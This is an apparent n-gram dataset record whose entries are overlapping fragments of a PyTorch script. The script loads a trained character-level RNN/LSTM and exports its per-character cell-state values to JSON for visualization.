ngram
listlengths
0
67.8k
[ "n_hidden=config.hidden_size, model=config.model, n_layers=config.n_layers) char_rnn.load_state_dict(torch.load(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) + '_' + str(", "char_to_int, config): # no trained model, train a new one if not path.exists(path.join(config.model_dir,", "for x in hidden]) # One-hot encode our data and make them Torch", "range(total_char): # for each character (time step) for j in range(config.n_layers): # for", "state hidden = char_rnn.init_hidden(1) # here, batch_size = 1 if torch.cuda.is_available() and config.cuda:", "tuple([x.cuda() for x in hidden]) # One-hot encode our data and make them", "train a new one if not path.exists(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) +", "path.exists(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) + '_' + str(config.n_layers) + '.pth')): raise", "seq = [] # store all test sequences in character form cell =", "char_cell['cell_layer_' + str(j + 1)] = [] total_char = len(cell) for i in", "1)] = [] total_char = len(cell) for i in range(total_char): # for each", "+ 1)] = [] total_char = len(cell) for i in range(total_char): # for", "for each in hidden]) inputs, targets = xp, y if config.cuda: inputs, targets", "for visualization char_cell = {} char_cell['cell_size'] = config.hidden_size char_cell['seq'] = ''.join(seq) # allocate", "= tuple([x.cuda() for x in hidden]) # One-hot encode our data and make", "in range(config.n_layers): char_cell['cell_layer_' + str(j + 1)] = [] total_char = len(cell) for", "flag to stop counter = 0 total = 0 for x, y in", "model char_rnn = CharRNNs(tokens=(int_to_char, char_to_int), n_hidden=config.hidden_size, model=config.model, n_layers=config.n_layers) char_rnn.load_state_dict(torch.load(path.join(config.model_dir, config.model + '_' +", "from utils import * from model import * import pdb def vis_cell(test_set, int_to_char,", "False # flag to stop counter = 0 total = 0 for x,", "range(config.seq_length): seq.extend([int_to_char[xs] for xs in x[i]]) hidden = char_rnn.init_hidden(1) # here, batch_size =", "1 out, hidden = char_rnn(inputs, hidden) (_, c_n) = hidden cell.append(c_n.data.cpu().squeeze().numpy()) # print", "# One-hot encode our data and make them Torch tensors xp = one_hot_encode(x[i],", "each in hidden]) inputs, targets = xp, y if config.cuda: inputs, targets =", "for j in range(config.n_layers): char_cell['cell_layer_' + str(j + 1)] = [] total_char =", "in hidden]) inputs, targets = xp, y if config.cuda: inputs, targets = inputs.cuda(),", "# print progress information print('Processing [batch: %d, sequence: %3d]...' % (counter, i)) print(total)", "stop_flag = False # flag to stop counter = 0 total = 0", "vis_cell(test_set, int_to_char, char_to_int, config): # no trained model, train a new one if", "Please train a new model first!') # load a trained model char_rnn =", "character (time step) for j in range(config.n_layers): # for each layer char_cell['cell_layer_' +", "# allocate space for cell values for j in range(config.n_layers): char_cell['cell_layer_' + str(j", "if not path.exists(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) + '_' + str(config.n_layers) +", "= tuple([each.data for each in hidden]) inputs, targets = xp, y if config.cuda:", "config.seq_length): if stop_flag: break counter += 1 for i in range(config.seq_length): seq.extend([int_to_char[xs] for", "config.model == 'lstm': hidden = tuple([each.data for each in hidden]) inputs, targets =", "# we'd backprop through the entire training history if config.model == 'lstm': hidden", "as np from utils import * from model import * import pdb def", "one_hot_encode(x[i], len(char_to_int.keys())) xp, y = torch.from_numpy(xp), torch.from_numpy(y) # Creating new variables for the", "j in range(config.n_layers): char_cell['cell_layer_' + str(j + 1)] = [] total_char = len(cell)", "for xs in x[i]]) hidden = char_rnn.init_hidden(1) # here, batch_size = 1 if", "total >= 10000: stop_flag = True if stop_flag: break # write seq and", "* from model import * import pdb def vis_cell(test_set, int_to_char, char_to_int, config): #", "model=config.model, n_layers=config.n_layers) char_rnn.load_state_dict(torch.load(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) + '_' + str( config.n_layers)", "xs in x[i]]) hidden = char_rnn.init_hidden(1) # here, batch_size = 1 if torch.cuda.is_available()", "+ '_' + str( config.n_layers) + '.pth'))) char_rnn.eval() #problem here!!!! # initialize hidden", "Torch tensors xp = one_hot_encode(x[i], len(char_to_int.keys())) xp, y = torch.from_numpy(xp), torch.from_numpy(y) # Creating", "file for visualization char_cell = {} char_cell['cell_size'] = config.hidden_size char_cell['seq'] = ''.join(seq) #", "test sequences in character form cell = [] # 2d array, store all", "import pdb def vis_cell(test_set, int_to_char, char_to_int, config): # no trained model, train a", "'lstm': hidden = tuple([each.data for each in hidden]) inputs, targets = xp, y", "char_cell['cell_size'] = config.hidden_size char_cell['seq'] = ''.join(seq) # allocate space for cell values for", "= [] total_char = len(cell) for i in range(total_char): # for each character", "our data and make them Torch tensors xp = one_hot_encode(x[i], len(char_to_int.keys())) xp, y", "total_char = len(cell) for i in range(total_char): # for each character (time step)", "= [] # store all test sequences in character form cell = []", "# for each layer char_cell['cell_layer_' + str(j + 1)].append(cell[i][j].tolist()) with open(path.join(config.vis_dir, 'char_cell.json'), 'w')", "import json import os.path as path import numpy as np from utils import", "= True if stop_flag: break # write seq and cell into a json", "and make them Torch tensors xp = one_hot_encode(x[i], len(char_to_int.keys())) xp, y = torch.from_numpy(xp),", "in range(config.n_layers): # for each layer char_cell['cell_layer_' + str(j + 1)].append(cell[i][j].tolist()) with open(path.join(config.vis_dir,", "c_n stop_flag = False # flag to stop counter = 0 total =", "== 'lstm': hidden = tuple([each.data for each in hidden]) inputs, targets = xp,", "hidden]) total += 1 out, hidden = char_rnn(inputs, hidden) (_, c_n) = hidden", "in character form cell = [] # 2d array, store all cell state", "char_rnn = CharRNNs(tokens=(int_to_char, char_to_int), n_hidden=config.hidden_size, model=config.model, n_layers=config.n_layers) char_rnn.load_state_dict(torch.load(path.join(config.model_dir, config.model + '_' + str(config.hidden_size)", "seq and cell into a json file for visualization char_cell = {} char_cell['cell_size']", "trained model! Please train a new model first!') # load a trained model", "y = torch.from_numpy(xp), torch.from_numpy(y) # Creating new variables for the hidden state, otherwise", "stop_flag: break # write seq and cell into a json file for visualization", "initialize hidden state hidden = char_rnn.init_hidden(1) # here, batch_size = 1 if torch.cuda.is_available()", "0 total = 0 for x, y in get_batches(test_set, config.batch_size, config.seq_length): if stop_flag:", "config.model + '_' + str(config.hidden_size) + '_' + str(config.n_layers) + '.pth')): raise Exception('No", "tuple([x.cuda() for x in hidden]) seq = [] # store all test sequences", "char_to_int), n_hidden=config.hidden_size, model=config.model, n_layers=config.n_layers) char_rnn.load_state_dict(torch.load(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) + '_' +", "inputs, targets = inputs.cuda(), targets.cuda() hidden = tuple([each.cuda() for each in hidden]) total", "print(total) if total >= 10000: stop_flag = True if stop_flag: break # write", "state values; each character corresponds to a row; each row is a c_n", "= one_hot_encode(x[i], len(char_to_int.keys())) xp, y = torch.from_numpy(xp), torch.from_numpy(y) # Creating new variables for", "and config.cuda: hidden = tuple([x.cuda() for x in hidden]) # One-hot encode our", "layer char_cell['cell_layer_' + str(j + 1)].append(cell[i][j].tolist()) with open(path.join(config.vis_dir, 'char_cell.json'), 'w') as json_file: json.dump(char_cell,", "= inputs.cuda(), targets.cuda() hidden = tuple([each.cuda() for each in hidden]) total += 1", "as path import numpy as np from utils import * from model import", "+ '_' + str(config.n_layers) + '.pth')): raise Exception('No such a trained model! Please", "cell into a json file for visualization char_cell = {} char_cell['cell_size'] = config.hidden_size", "visualization char_cell = {} char_cell['cell_size'] = config.hidden_size char_cell['seq'] = ''.join(seq) # allocate space", "if torch.cuda.is_available() and config.cuda: hidden = tuple([x.cuda() for x in hidden]) seq =", "1 if torch.cuda.is_available() and config.cuda: hidden = tuple([x.cuda() for x in hidden]) #", "training history if config.model == 'lstm': hidden = tuple([each.data for each in hidden])", "new model first!') # load a trained model char_rnn = CharRNNs(tokens=(int_to_char, char_to_int), n_hidden=config.hidden_size,", "config.cuda: inputs, targets = inputs.cuda(), targets.cuda() hidden = tuple([each.cuda() for each in hidden])", "model, train a new one if not path.exists(path.join(config.model_dir, config.model + '_' + str(config.hidden_size)", "store all test sequences in character form cell = [] # 2d array,", "targets.cuda() hidden = tuple([each.cuda() for each in hidden]) total += 1 out, hidden", "stop_flag: break counter += 1 for i in range(config.seq_length): seq.extend([int_to_char[xs] for xs in", "x in hidden]) seq = [] # store all test sequences in character", "<gh_stars>0 import json import os.path as path import numpy as np from utils", "and config.cuda: hidden = tuple([x.cuda() for x in hidden]) seq = [] #", "range(config.n_layers): char_cell['cell_layer_' + str(j + 1)] = [] total_char = len(cell) for i", "xp, y = torch.from_numpy(xp), torch.from_numpy(y) # Creating new variables for the hidden state,", "json file for visualization char_cell = {} char_cell['cell_size'] = config.hidden_size char_cell['seq'] = ''.join(seq)", "to stop counter = 0 total = 0 for x, y in get_batches(test_set,", "one if not path.exists(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) + '_' + str(config.n_layers)", "hidden cell.append(c_n.data.cpu().squeeze().numpy()) # print progress information print('Processing [batch: %d, sequence: %3d]...' % (counter,", "model! Please train a new model first!') # load a trained model char_rnn", "cell = [] # 2d array, store all cell state values; each character", "for x in hidden]) seq = [] # store all test sequences in", "write seq and cell into a json file for visualization char_cell = {}", "= ''.join(seq) # allocate space for cell values for j in range(config.n_layers): char_cell['cell_layer_'", "torch.from_numpy(xp), torch.from_numpy(y) # Creating new variables for the hidden state, otherwise # we'd", "str(j + 1)] = [] total_char = len(cell) for i in range(total_char): #", "in hidden]) total += 1 out, hidden = char_rnn(inputs, hidden) (_, c_n) =", "in range(total_char): # for each character (time step) for j in range(config.n_layers): #", "char_rnn.load_state_dict(torch.load(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) + '_' + str( config.n_layers) + '.pth')))", "os.path as path import numpy as np from utils import * from model", "in range(config.seq_length): seq.extend([int_to_char[xs] for xs in x[i]]) hidden = char_rnn.init_hidden(1) # here, batch_size", "hidden]) inputs, targets = xp, y if config.cuda: inputs, targets = inputs.cuda(), targets.cuda()", "import numpy as np from utils import * from model import * import", "character corresponds to a row; each row is a c_n stop_flag = False", "# Creating new variables for the hidden state, otherwise # we'd backprop through", "# load a trained model char_rnn = CharRNNs(tokens=(int_to_char, char_to_int), n_hidden=config.hidden_size, model=config.model, n_layers=config.n_layers) char_rnn.load_state_dict(torch.load(path.join(config.model_dir,", "# for each character (time step) for j in range(config.n_layers): # for each", "for the hidden state, otherwise # we'd backprop through the entire training history", "[] total_char = len(cell) for i in range(total_char): # for each character (time", "torch.cuda.is_available() and config.cuda: hidden = tuple([x.cuda() for x in hidden]) # One-hot encode", "+ '_' + str(config.hidden_size) + '_' + str(config.n_layers) + '.pth')): raise Exception('No such", "make them Torch tensors xp = one_hot_encode(x[i], len(char_to_int.keys())) xp, y = torch.from_numpy(xp), torch.from_numpy(y)", "character form cell = [] # 2d array, store all cell state values;", "'_' + str( config.n_layers) + '.pth'))) char_rnn.eval() #problem here!!!! # initialize hidden state", "i)) print(total) if total >= 10000: stop_flag = True if stop_flag: break #", "a new model first!') # load a trained model char_rnn = CharRNNs(tokens=(int_to_char, char_to_int),", "the hidden state, otherwise # we'd backprop through the entire training history if", "the entire training history if config.model == 'lstm': hidden = tuple([each.data for each", "if total >= 10000: stop_flag = True if stop_flag: break # write seq", "in get_batches(test_set, config.batch_size, config.seq_length): if stop_flag: break counter += 1 for i in", "tuple([each.data for each in hidden]) inputs, targets = xp, y if config.cuda: inputs,", "str(config.hidden_size) + '_' + str( config.n_layers) + '.pth'))) char_rnn.eval() #problem here!!!! # initialize", "= tuple([each.cuda() for each in hidden]) total += 1 out, hidden = char_rnn(inputs,", "tuple([each.cuda() for each in hidden]) total += 1 out, hidden = char_rnn(inputs, hidden)", "print progress information print('Processing [batch: %d, sequence: %3d]...' % (counter, i)) print(total) if", "hidden) (_, c_n) = hidden cell.append(c_n.data.cpu().squeeze().numpy()) # print progress information print('Processing [batch: %d,", "char_cell['cell_layer_' + str(j + 1)].append(cell[i][j].tolist()) with open(path.join(config.vis_dir, 'char_cell.json'), 'w') as json_file: json.dump(char_cell, json_file)", "trained model, train a new one if not path.exists(path.join(config.model_dir, config.model + '_' +", "each character corresponds to a row; each row is a c_n stop_flag =", "for each layer char_cell['cell_layer_' + str(j + 1)].append(cell[i][j].tolist()) with open(path.join(config.vis_dir, 'char_cell.json'), 'w') as", "sequences in character form cell = [] # 2d array, store all cell", "= 1 if torch.cuda.is_available() and config.cuda: hidden = tuple([x.cuda() for x in hidden])", "new variables for the hidden state, otherwise # we'd backprop through the entire", ">= 10000: stop_flag = True if stop_flag: break # write seq and cell", "numpy as np from utils import * from model import * import pdb", "such a trained model! Please train a new model first!') # load a", "history if config.model == 'lstm': hidden = tuple([each.data for each in hidden]) inputs,", "Exception('No such a trained model! Please train a new model first!') # load", "stop counter = 0 total = 0 for x, y in get_batches(test_set, config.batch_size,", "'_' + str(config.n_layers) + '.pth')): raise Exception('No such a trained model! Please train", "+ str(j + 1)] = [] total_char = len(cell) for i in range(total_char):", "print('Processing [batch: %d, sequence: %3d]...' % (counter, i)) print(total) if total >= 10000:", "config.n_layers) + '.pth'))) char_rnn.eval() #problem here!!!! # initialize hidden state hidden = char_rnn.init_hidden(1)", "if stop_flag: break counter += 1 for i in range(config.seq_length): seq.extend([int_to_char[xs] for xs", "char_rnn(inputs, hidden) (_, c_n) = hidden cell.append(c_n.data.cpu().squeeze().numpy()) # print progress information print('Processing [batch:", "x, y in get_batches(test_set, config.batch_size, config.seq_length): if stop_flag: break counter += 1 for", "form cell = [] # 2d array, store all cell state values; each", "trained model char_rnn = CharRNNs(tokens=(int_to_char, char_to_int), n_hidden=config.hidden_size, model=config.model, n_layers=config.n_layers) char_rnn.load_state_dict(torch.load(path.join(config.model_dir, config.model + '_'", "through the entire training history if config.model == 'lstm': hidden = tuple([each.data for", "[] # store all test sequences in character form cell = [] #", "space for cell values for j in range(config.n_layers): char_cell['cell_layer_' + str(j + 1)]", "each character (time step) for j in range(config.n_layers): # for each layer char_cell['cell_layer_'", "torch.cuda.is_available() and config.cuda: hidden = tuple([x.cuda() for x in hidden]) seq = []", "model first!') # load a trained model char_rnn = CharRNNs(tokens=(int_to_char, char_to_int), n_hidden=config.hidden_size, model=config.model,", "% (counter, i)) print(total) if total >= 10000: stop_flag = True if stop_flag:", "we'd backprop through the entire training history if config.model == 'lstm': hidden =", "break counter += 1 for i in range(config.seq_length): seq.extend([int_to_char[xs] for xs in x[i]])", "%d, sequence: %3d]...' % (counter, i)) print(total) if total >= 10000: stop_flag =", "each in hidden]) total += 1 out, hidden = char_rnn(inputs, hidden) (_, c_n)", "each layer char_cell['cell_layer_' + str(j + 1)].append(cell[i][j].tolist()) with open(path.join(config.vis_dir, 'char_cell.json'), 'w') as json_file:", "backprop through the entire training history if config.model == 'lstm': hidden = tuple([each.data", "them Torch tensors xp = one_hot_encode(x[i], len(char_to_int.keys())) xp, y = torch.from_numpy(xp), torch.from_numpy(y) #", "break # write seq and cell into a json file for visualization char_cell", "char_rnn.eval() #problem here!!!! # initialize hidden state hidden = char_rnn.init_hidden(1) # here, batch_size", "if config.cuda: inputs, targets = inputs.cuda(), targets.cuda() hidden = tuple([each.cuda() for each in", "= xp, y if config.cuda: inputs, targets = inputs.cuda(), targets.cuda() hidden = tuple([each.cuda()", "char_rnn.init_hidden(1) # here, batch_size = 1 if torch.cuda.is_available() and config.cuda: hidden = tuple([x.cuda()", "for i in range(total_char): # for each character (time step) for j in", "= CharRNNs(tokens=(int_to_char, char_to_int), n_hidden=config.hidden_size, model=config.model, n_layers=config.n_layers) char_rnn.load_state_dict(torch.load(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) +", "hidden state, otherwise # we'd backprop through the entire training history if config.model", "str( config.n_layers) + '.pth'))) char_rnn.eval() #problem here!!!! # initialize hidden state hidden =", "'.pth'))) char_rnn.eval() #problem here!!!! # initialize hidden state hidden = char_rnn.init_hidden(1) # here,", "%3d]...' % (counter, i)) print(total) if total >= 10000: stop_flag = True if", "utils import * from model import * import pdb def vis_cell(test_set, int_to_char, char_to_int,", "train a new model first!') # load a trained model char_rnn = CharRNNs(tokens=(int_to_char,", "targets = xp, y if config.cuda: inputs, targets = inputs.cuda(), targets.cuda() hidden =", "all test sequences in character form cell = [] # 2d array, store", "config.batch_size, config.seq_length): if stop_flag: break counter += 1 for i in range(config.seq_length): seq.extend([int_to_char[xs]", "progress information print('Processing [batch: %d, sequence: %3d]...' % (counter, i)) print(total) if total", "here, batch_size = 1 if torch.cuda.is_available() and config.cuda: hidden = tuple([x.cuda() for x", "= len(cell) for i in range(total_char): # for each character (time step) for", "hidden = tuple([x.cuda() for x in hidden]) # One-hot encode our data and", "config.hidden_size char_cell['seq'] = ''.join(seq) # allocate space for cell values for j in", "char_cell['seq'] = ''.join(seq) # allocate space for cell values for j in range(config.n_layers):", "xp = one_hot_encode(x[i], len(char_to_int.keys())) xp, y = torch.from_numpy(xp), torch.from_numpy(y) # Creating new variables", "+= 1 for i in range(config.seq_length): seq.extend([int_to_char[xs] for xs in x[i]]) hidden =", "y if config.cuda: inputs, targets = inputs.cuda(), targets.cuda() hidden = tuple([each.cuda() for each", "information print('Processing [batch: %d, sequence: %3d]...' % (counter, i)) print(total) if total >=", "[] # 2d array, store all cell state values; each character corresponds to", "and cell into a json file for visualization char_cell = {} char_cell['cell_size'] =", "= torch.from_numpy(xp), torch.from_numpy(y) # Creating new variables for the hidden state, otherwise #", "a trained model! Please train a new model first!') # load a trained", "import * from model import * import pdb def vis_cell(test_set, int_to_char, char_to_int, config):", "config.cuda: hidden = tuple([x.cuda() for x in hidden]) # One-hot encode our data", "= config.hidden_size char_cell['seq'] = ''.join(seq) # allocate space for cell values for j", "a c_n stop_flag = False # flag to stop counter = 0 total", "= 0 total = 0 for x, y in get_batches(test_set, config.batch_size, config.seq_length): if", "inputs.cuda(), targets.cuda() hidden = tuple([each.cuda() for each in hidden]) total += 1 out,", "a json file for visualization char_cell = {} char_cell['cell_size'] = config.hidden_size char_cell['seq'] =", "x[i]]) hidden = char_rnn.init_hidden(1) # here, batch_size = 1 if torch.cuda.is_available() and config.cuda:", "= char_rnn.init_hidden(1) # here, batch_size = 1 if torch.cuda.is_available() and config.cuda: hidden =", "# flag to stop counter = 0 total = 0 for x, y", "a trained model char_rnn = CharRNNs(tokens=(int_to_char, char_to_int), n_hidden=config.hidden_size, model=config.model, n_layers=config.n_layers) char_rnn.load_state_dict(torch.load(path.join(config.model_dir, config.model +", "seq.extend([int_to_char[xs] for xs in x[i]]) hidden = char_rnn.init_hidden(1) # here, batch_size = 1", "data and make them Torch tensors xp = one_hot_encode(x[i], len(char_to_int.keys())) xp, y =", "load a trained model char_rnn = CharRNNs(tokens=(int_to_char, char_to_int), n_hidden=config.hidden_size, model=config.model, n_layers=config.n_layers) char_rnn.load_state_dict(torch.load(path.join(config.model_dir, config.model", "new one if not path.exists(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) + '_' +", "# initialize hidden state hidden = char_rnn.init_hidden(1) # here, batch_size = 1 if", "hidden = tuple([x.cuda() for x in hidden]) seq = [] # store all", "step) for j in range(config.n_layers): # for each layer char_cell['cell_layer_' + str(j +", "for i in range(config.seq_length): seq.extend([int_to_char[xs] for xs in x[i]]) hidden = char_rnn.init_hidden(1) #", "torch.from_numpy(y) # Creating new variables for the hidden state, otherwise # we'd backprop", "0 for x, y in get_batches(test_set, config.batch_size, config.seq_length): if stop_flag: break counter +=", "config): # no trained model, train a new one if not path.exists(path.join(config.model_dir, config.model", "+ '_' + str(config.hidden_size) + '_' + str( config.n_layers) + '.pth'))) char_rnn.eval() #problem", "into a json file for visualization char_cell = {} char_cell['cell_size'] = config.hidden_size char_cell['seq']", "each row is a c_n stop_flag = False # flag to stop counter", "= [] # 2d array, store all cell state values; each character corresponds", "= hidden cell.append(c_n.data.cpu().squeeze().numpy()) # print progress information print('Processing [batch: %d, sequence: %3d]...' %", "not path.exists(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) + '_' + str(config.n_layers) + '.pth')):", "* import pdb def vis_cell(test_set, int_to_char, char_to_int, config): # no trained model, train", "corresponds to a row; each row is a c_n stop_flag = False #", "'_' + str(config.hidden_size) + '_' + str( config.n_layers) + '.pth'))) char_rnn.eval() #problem here!!!!", "hidden]) # One-hot encode our data and make them Torch tensors xp =", "j in range(config.n_layers): # for each layer char_cell['cell_layer_' + str(j + 1)].append(cell[i][j].tolist()) with", "raise Exception('No such a trained model! Please train a new model first!') #", "hidden = char_rnn(inputs, hidden) (_, c_n) = hidden cell.append(c_n.data.cpu().squeeze().numpy()) # print progress information", "= 0 for x, y in get_batches(test_set, config.batch_size, config.seq_length): if stop_flag: break counter", "(time step) for j in range(config.n_layers): # for each layer char_cell['cell_layer_' + str(j", "xp, y if config.cuda: inputs, targets = inputs.cuda(), targets.cuda() hidden = tuple([each.cuda() for", "[batch: %d, sequence: %3d]...' % (counter, i)) print(total) if total >= 10000: stop_flag", "{} char_cell['cell_size'] = config.hidden_size char_cell['seq'] = ''.join(seq) # allocate space for cell values", "One-hot encode our data and make them Torch tensors xp = one_hot_encode(x[i], len(char_to_int.keys()))", "if stop_flag: break # write seq and cell into a json file for", "# here, batch_size = 1 if torch.cuda.is_available() and config.cuda: hidden = tuple([x.cuda() for", "total += 1 out, hidden = char_rnn(inputs, hidden) (_, c_n) = hidden cell.append(c_n.data.cpu().squeeze().numpy())", "for each in hidden]) total += 1 out, hidden = char_rnn(inputs, hidden) (_,", "# write seq and cell into a json file for visualization char_cell =", "hidden state hidden = char_rnn.init_hidden(1) # here, batch_size = 1 if torch.cuda.is_available() and", "get_batches(test_set, config.batch_size, config.seq_length): if stop_flag: break counter += 1 for i in range(config.seq_length):", "''.join(seq) # allocate space for cell values for j in range(config.n_layers): char_cell['cell_layer_' +", "CharRNNs(tokens=(int_to_char, char_to_int), n_hidden=config.hidden_size, model=config.model, n_layers=config.n_layers) char_rnn.load_state_dict(torch.load(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) + '_'", "+ '.pth'))) char_rnn.eval() #problem here!!!! # initialize hidden state hidden = char_rnn.init_hidden(1) #", "is a c_n stop_flag = False # flag to stop counter = 0", "config.cuda: hidden = tuple([x.cuda() for x in hidden]) seq = [] # store", "10000: stop_flag = True if stop_flag: break # write seq and cell into", "np from utils import * from model import * import pdb def vis_cell(test_set,", "# 2d array, store all cell state values; each character corresponds to a", "for cell values for j in range(config.n_layers): char_cell['cell_layer_' + str(j + 1)] =", "'_' + str(config.hidden_size) + '_' + str(config.n_layers) + '.pth')): raise Exception('No such a", "row; each row is a c_n stop_flag = False # flag to stop", "out, hidden = char_rnn(inputs, hidden) (_, c_n) = hidden cell.append(c_n.data.cpu().squeeze().numpy()) # print progress", "model import * import pdb def vis_cell(test_set, int_to_char, char_to_int, config): # no trained", "1 if torch.cuda.is_available() and config.cuda: hidden = tuple([x.cuda() for x in hidden]) seq", "cell state values; each character corresponds to a row; each row is a", "import os.path as path import numpy as np from utils import * from", "1 for i in range(config.seq_length): seq.extend([int_to_char[xs] for xs in x[i]]) hidden = char_rnn.init_hidden(1)", "import * import pdb def vis_cell(test_set, int_to_char, char_to_int, config): # no trained model,", "first!') # load a trained model char_rnn = CharRNNs(tokens=(int_to_char, char_to_int), n_hidden=config.hidden_size, model=config.model, n_layers=config.n_layers)", "counter = 0 total = 0 for x, y in get_batches(test_set, config.batch_size, config.seq_length):", "range(config.n_layers): # for each layer char_cell['cell_layer_' + str(j + 1)].append(cell[i][j].tolist()) with open(path.join(config.vis_dir, 'char_cell.json'),", "def vis_cell(test_set, int_to_char, char_to_int, config): # no trained model, train a new one", "row is a c_n stop_flag = False # flag to stop counter =", "counter += 1 for i in range(config.seq_length): seq.extend([int_to_char[xs] for xs in x[i]]) hidden", "hidden = tuple([each.data for each in hidden]) inputs, targets = xp, y if", "sequence: %3d]...' % (counter, i)) print(total) if total >= 10000: stop_flag = True", "+ str(config.hidden_size) + '_' + str(config.n_layers) + '.pth')): raise Exception('No such a trained", "all cell state values; each character corresponds to a row; each row is", "here!!!! # initialize hidden state hidden = char_rnn.init_hidden(1) # here, batch_size = 1", "+ str( config.n_layers) + '.pth'))) char_rnn.eval() #problem here!!!! # initialize hidden state hidden", "(_, c_n) = hidden cell.append(c_n.data.cpu().squeeze().numpy()) # print progress information print('Processing [batch: %d, sequence:", "path import numpy as np from utils import * from model import *", "len(char_to_int.keys())) xp, y = torch.from_numpy(xp), torch.from_numpy(y) # Creating new variables for the hidden", "n_layers=config.n_layers) char_rnn.load_state_dict(torch.load(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) + '_' + str( config.n_layers) +", "total = 0 for x, y in get_batches(test_set, config.batch_size, config.seq_length): if stop_flag: break", "'.pth')): raise Exception('No such a trained model! Please train a new model first!')", "hidden = char_rnn.init_hidden(1) # here, batch_size = 1 if torch.cuda.is_available() and config.cuda: hidden", "hidden]) seq = [] # store all test sequences in character form cell", "= char_rnn(inputs, hidden) (_, c_n) = hidden cell.append(c_n.data.cpu().squeeze().numpy()) # print progress information print('Processing", "+ str(config.n_layers) + '.pth')): raise Exception('No such a trained model! Please train a", "from model import * import pdb def vis_cell(test_set, int_to_char, char_to_int, config): # no", "int_to_char, char_to_int, config): # no trained model, train a new one if not", "x in hidden]) # One-hot encode our data and make them Torch tensors", "values; each character corresponds to a row; each row is a c_n stop_flag", "i in range(config.seq_length): seq.extend([int_to_char[xs] for xs in x[i]]) hidden = char_rnn.init_hidden(1) # here,", "= {} char_cell['cell_size'] = config.hidden_size char_cell['seq'] = ''.join(seq) # allocate space for cell", "to a row; each row is a c_n stop_flag = False # flag", "if config.model == 'lstm': hidden = tuple([each.data for each in hidden]) inputs, targets", "allocate space for cell values for j in range(config.n_layers): char_cell['cell_layer_' + str(j +", "str(config.hidden_size) + '_' + str(config.n_layers) + '.pth')): raise Exception('No such a trained model!", "a row; each row is a c_n stop_flag = False # flag to", "for x, y in get_batches(test_set, config.batch_size, config.seq_length): if stop_flag: break counter += 1", "no trained model, train a new one if not path.exists(path.join(config.model_dir, config.model + '_'", "for j in range(config.n_layers): # for each layer char_cell['cell_layer_' + str(j + 1)].append(cell[i][j].tolist())", "y in get_batches(test_set, config.batch_size, config.seq_length): if stop_flag: break counter += 1 for i", "Creating new variables for the hidden state, otherwise # we'd backprop through the", "store all cell state values; each character corresponds to a row; each row", "= False # flag to stop counter = 0 total = 0 for", "in hidden]) # One-hot encode our data and make them Torch tensors xp", "char_cell = {} char_cell['cell_size'] = config.hidden_size char_cell['seq'] = ''.join(seq) # allocate space for", "= tuple([x.cuda() for x in hidden]) seq = [] # store all test", "if torch.cuda.is_available() and config.cuda: hidden = tuple([x.cuda() for x in hidden]) # One-hot", "pdb def vis_cell(test_set, int_to_char, char_to_int, config): # no trained model, train a new", "batch_size = 1 if torch.cuda.is_available() and config.cuda: hidden = tuple([x.cuda() for x in", "json import os.path as path import numpy as np from utils import *", "cell values for j in range(config.n_layers): char_cell['cell_layer_' + str(j + 1)] = []", "a new one if not path.exists(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) + '_'", "# no trained model, train a new one if not path.exists(path.join(config.model_dir, config.model +", "+= 1 out, hidden = char_rnn(inputs, hidden) (_, c_n) = hidden cell.append(c_n.data.cpu().squeeze().numpy()) #", "in x[i]]) hidden = char_rnn.init_hidden(1) # here, batch_size = 1 if torch.cuda.is_available() and", "len(cell) for i in range(total_char): # for each character (time step) for j", "array, store all cell state values; each character corresponds to a row; each", "(counter, i)) print(total) if total >= 10000: stop_flag = True if stop_flag: break", "+ str(config.hidden_size) + '_' + str( config.n_layers) + '.pth'))) char_rnn.eval() #problem here!!!! #", "otherwise # we'd backprop through the entire training history if config.model == 'lstm':", "# store all test sequences in character form cell = [] # 2d", "encode our data and make them Torch tensors xp = one_hot_encode(x[i], len(char_to_int.keys())) xp,", "2d array, store all cell state values; each character corresponds to a row;", "True if stop_flag: break # write seq and cell into a json file", "inputs, targets = xp, y if config.cuda: inputs, targets = inputs.cuda(), targets.cuda() hidden", "targets = inputs.cuda(), targets.cuda() hidden = tuple([each.cuda() for each in hidden]) total +=", "+ '.pth')): raise Exception('No such a trained model! Please train a new model", "c_n) = hidden cell.append(c_n.data.cpu().squeeze().numpy()) # print progress information print('Processing [batch: %d, sequence: %3d]...'", "values for j in range(config.n_layers): char_cell['cell_layer_' + str(j + 1)] = [] total_char", "entire training history if config.model == 'lstm': hidden = tuple([each.data for each in", "str(config.n_layers) + '.pth')): raise Exception('No such a trained model! Please train a new", "tensors xp = one_hot_encode(x[i], len(char_to_int.keys())) xp, y = torch.from_numpy(xp), torch.from_numpy(y) # Creating new", "config.model + '_' + str(config.hidden_size) + '_' + str( config.n_layers) + '.pth'))) char_rnn.eval()", "for each character (time step) for j in range(config.n_layers): # for each layer", "state, otherwise # we'd backprop through the entire training history if config.model ==", "in hidden]) seq = [] # store all test sequences in character form", "hidden = tuple([each.cuda() for each in hidden]) total += 1 out, hidden =", "#problem here!!!! # initialize hidden state hidden = char_rnn.init_hidden(1) # here, batch_size =", "variables for the hidden state, otherwise # we'd backprop through the entire training", "cell.append(c_n.data.cpu().squeeze().numpy()) # print progress information print('Processing [batch: %d, sequence: %3d]...' % (counter, i))", "stop_flag = True if stop_flag: break # write seq and cell into a", "i in range(total_char): # for each character (time step) for j in range(config.n_layers):" ]
